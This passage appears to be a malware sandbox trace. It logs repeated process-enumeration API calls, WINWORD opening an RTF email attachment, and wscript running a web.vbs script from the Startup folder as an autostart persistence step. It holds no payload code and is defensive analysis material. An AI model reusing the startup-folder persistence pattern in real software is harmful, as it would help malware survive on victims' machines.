th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.816] Sleep (dwMilliseconds=0x64) [0125.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2a8 [0125.923] Process32FirstW (in: hSnapshot=0x2a8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0125.974] Sleep (dwMilliseconds=0x64) [0126.074] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2ac [0126.079] Process32FirstW (in: hSnapshot=0x2ac, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.129] Sleep (dwMilliseconds=0x64) [0126.236] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2b0 [0126.240] Process32FirstW (in: hSnapshot=0x2b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.291] Sleep (dwMilliseconds=0x64) [0126.386] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2b4 [0126.390] Process32FirstW (in: hSnapshot=0x2b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.447] Sleep (dwMilliseconds=0x64) [0126.542] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2b8 [0126.546] Process32FirstW (in: hSnapshot=0x2b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.595] Sleep (dwMilliseconds=0x64) [0126.698] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2bc [0126.702] Process32FirstW (in: hSnapshot=0x2bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.754] Sleep (dwMilliseconds=0x64) [0126.867] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2c0 [0126.871] Process32FirstW (in: hSnapshot=0x2c0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.934] Sleep (dwMilliseconds=0x64) [0127.041] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2c4 [0127.044] Process32FirstW (in: hSnapshot=0x2c4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.102] Sleep (dwMilliseconds=0x64) [0127.200] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2c8 [0127.204] Process32FirstW (in: hSnapshot=0x2c8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.254] Sleep (dwMilliseconds=0x64) [0127.455] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2cc [0127.460] Process32FirstW (in: hSnapshot=0x2cc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.522] Sleep (dwMilliseconds=0x64) [0127.758] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2d0 [0127.763] Process32FirstW (in: hSnapshot=0x2d0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.848] Sleep (dwMilliseconds=0x64) [0128.230] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2d4 [0128.234] Process32FirstW (in: hSnapshot=0x2d4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.283] Sleep (dwMilliseconds=0x64) [0128.393] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2d8 [0128.397] Process32FirstW (in: hSnapshot=0x2d8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.449] Sleep (dwMilliseconds=0x64) [0128.554] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2dc [0128.558] Process32FirstW (in: hSnapshot=0x2dc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.613] Sleep (dwMilliseconds=0x64) [0128.710] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e0 [0128.714] Process32FirstW (in: hSnapshot=0x2e0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.764] Sleep (dwMilliseconds=0x64) [0128.881] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e4 [0128.885] Process32FirstW (in: hSnapshot=0x2e4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.996] Sleep (dwMilliseconds=0x64) [0129.101] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e8 [0129.105] Process32FirstW (in: hSnapshot=0x2e8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.172] Sleep (dwMilliseconds=0x64) [0129.365] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2ec [0129.369] Process32FirstW (in: hSnapshot=0x2ec, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.443] Sleep (dwMilliseconds=0x64) [0129.834] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f0 [0129.838] Process32FirstW (in: hSnapshot=0x2f0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.889] Sleep (dwMilliseconds=0x64) [0130.083] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f4 [0130.086] Process32FirstW (in: hSnapshot=0x2f4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.210] Sleep (dwMilliseconds=0x64) [0131.132] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f8 [0131.136] Process32FirstW (in: hSnapshot=0x2f8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.198] Sleep (dwMilliseconds=0x64) [0131.316] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2fc [0131.320] Process32FirstW (in: hSnapshot=0x2fc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.417] Sleep (dwMilliseconds=0x64) [0131.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x300 [0131.528] Process32FirstW (in: hSnapshot=0x300, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.788] Sleep (dwMilliseconds=0x64) [0131.932] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x304 [0131.937] Process32FirstW (in: hSnapshot=0x304, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.996] Sleep (dwMilliseconds=0x64) [0132.095] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x308 [0132.099] Process32FirstW (in: hSnapshot=0x308, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.161] Sleep (dwMilliseconds=0x64) [0132.269] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x30c [0132.273] Process32FirstW (in: hSnapshot=0x30c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.323] Sleep (dwMilliseconds=0x64) [0132.454] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x310 [0132.458] Process32FirstW (in: hSnapshot=0x310, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.553] Sleep (dwMilliseconds=0x64) [0132.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x314 [0132.692] Process32FirstW (in: hSnapshot=0x314, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.787] Sleep (dwMilliseconds=0x64) [0132.891] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x318 [0132.894] Process32FirstW (in: hSnapshot=0x318, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.942] Sleep (dwMilliseconds=0x64) [0133.047] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x31c [0133.051] Process32FirstW (in: hSnapshot=0x31c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.098] Sleep (dwMilliseconds=0x64) [0133.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x320 [0133.207] Process32FirstW (in: hSnapshot=0x320, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.255] Sleep (dwMilliseconds=0x64) [0133.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x324 [0133.362] Process32FirstW (in: hSnapshot=0x324, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.411] Sleep (dwMilliseconds=0x64) [0133.515] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x328 [0133.519] Process32FirstW (in: hSnapshot=0x328, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.567] Sleep (dwMilliseconds=0x64) [0133.671] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x32c [0133.674] Process32FirstW (in: hSnapshot=0x32c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.748] Sleep (dwMilliseconds=0x64) [0133.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x330 [0133.846] Process32FirstW (in: hSnapshot=0x330, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.928] Sleep (dwMilliseconds=0x64) [0134.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x334 [0134.034] Process32FirstW (in: hSnapshot=0x334, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.103] Sleep (dwMilliseconds=0x64) [0134.201] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x338 [0134.205] Process32FirstW (in: hSnapshot=0x338, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.259] Sleep (dwMilliseconds=0x64) [0134.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x33c [0134.361] Process32FirstW (in: hSnapshot=0x33c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.437] Sleep (dwMilliseconds=0x64) Process: id = "9" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x1bd00000" os_pid = "0xcac" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x458" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" \"C:\\Users\\aETAdzjz\\Desktop\\tmpeml_attach_for_scan8939506995a312b8dcb233913095b87d.file.rtf\"" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 58 os_tid = 0xda0 Thread: id = 59 os_tid = 0xd94 Thread: id = 60 os_tid = 0xd04 Thread: id = 61 os_tid = 0xd00 Thread: id = 62 os_tid = 0xcf8 Thread: id = 63 os_tid = 0xcf4 Thread: id = 64 os_tid = 0xcf0 Thread: id = 65 os_tid = 0xce8 Thread: id = 66 os_tid = 0xce4 Thread: id = 67 os_tid = 0xce0 Thread: id = 68 os_tid = 0xcdc Thread: id = 69 os_tid = 0xcd8 Thread: id = 70 os_tid = 0xcd0 Thread: id = 71 os_tid = 0xccc Thread: id = 72 os_tid = 0xcc8 Thread: id = 73 os_tid = 0xcc4 Thread: id = 74 os_tid = 0xcc0 Thread: id = 75 os_tid = 0xcb8 Thread: id = 76 os_tid = 0xcb4 Thread: id = 77 os_tid = 0xcb0 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x76927000" os_pid = "0x364" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d5fc" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 87 os_tid = 0xef8 Thread: id = 88 os_tid = 0xef4 Thread: id = 89 os_tid = 0xef0 Thread: id = 90 os_tid = 0xed4 Thread: id = 91 os_tid = 0xed0 Thread: id = 92 os_tid = 0xecc Thread: id = 93 os_tid = 0xe4c Thread: id = 94 os_tid = 0xdcc Thread: id = 95 os_tid = 0xd38 Thread: id = 96 os_tid = 0xc54 Thread: id = 97 os_tid = 0xc50 Thread: id = 98 os_tid = 0xc44 Thread: id = 99 os_tid = 0xc38 Thread: id = 100 os_tid = 0x7c8 Thread: id = 101 os_tid = 0x42c Thread: id = 102 os_tid = 0x734 Thread: id = 103 os_tid = 0x130 Thread: id = 104 os_tid = 0x6fc Thread: id = 105 os_tid = 0x6f0 Thread: id = 106 os_tid = 0x6dc Thread: id = 107 os_tid = 0x6d0 Thread: id = 108 os_tid = 0x6c8 Thread: id = 109 os_tid = 0x6b4 Thread: id = 110 os_tid = 0x49c Thread: id = 111 os_tid = 0x450 Thread: id = 112 os_tid = 0x444 Thread: id = 113 os_tid = 0x424 Thread: id = 114 os_tid = 0x41c Thread: id = 115 os_tid = 0x404 Thread: id = 116 os_tid = 0x154 Thread: id = 117 os_tid = 0x3f4 Thread: id = 118 os_tid = 0x3e8 Thread: id = 119 os_tid = 0x3dc Thread: id = 120 os_tid = 0x390 Thread: id = 121 os_tid = 0x384 Thread: id = 122 os_tid = 0x370 Thread: id = 123 os_tid = 0x368 Thread: id = 140 os_tid = 0xf18 Thread: id = 141 os_tid = 0xf1c Thread: id = 142 os_tid = 0xf20 Thread: id = 143 os_tid = 0xf24 Thread: id = 144 os_tid = 0xf28 Process: id = "11" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x50f47000" os_pid = "0xb00" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00047d26" [0xc000000f] Thread: id = 124 os_tid = 0xf0c Thread: id = 125 os_tid = 0xc48 Thread: id = 126 os_tid = 0xb28 Thread: id = 127 os_tid = 0xb20 Thread: id = 128 os_tid = 0xb1c Thread: id = 129 os_tid = 0xb18 Thread: id = 130 os_tid = 0xb08 Thread: id = 131 os_tid = 0xb04 Process: id = "12" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x51a42000" os_pid = "0xac0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "10" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d5fc" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 132 os_tid = 0xc4c Thread: id = 133 os_tid = 0xae8 Thread: id = 134 os_tid = 0xae4 Thread: id = 135 os_tid = 0xae0 Thread: id = 136 os_tid = 0xadc Thread: id = 137 os_tid = 0xad8 Thread: id = 138 os_tid = 0xac8 Thread: id = 139 os_tid = 0xac4 Process: id = "13" image_name = "wscript.exe" filename = "c:\\windows\\system32\\wscript.exe" page_root = "0xe3f1000" os_pid = "0x548" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x458" cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\web.vbs\" " cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f781" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 150 os_tid = 0x54c [0187.277] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af880 | out: lpSystemTimeAsFileTime=0x1af880*(dwLowDateTime=0xcfcf45e0, dwHighDateTime=0x1d66ab6)) [0187.277] GetCurrentProcessId () returned 0x548 [0187.277] GetCurrentThreadId () returned 0x54c [0187.277] GetTickCount () returned 0x112f6dd [0187.277] QueryPerformanceCounter (in: lpPerformanceCount=0x1af888 | out: lpPerformanceCount=0x1af888*=6370003268) returned 1 [0187.277] GetStartupInfoA (in: lpStartupInfo=0x1af8a0 | out: lpStartupInfo=0x1af8a0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 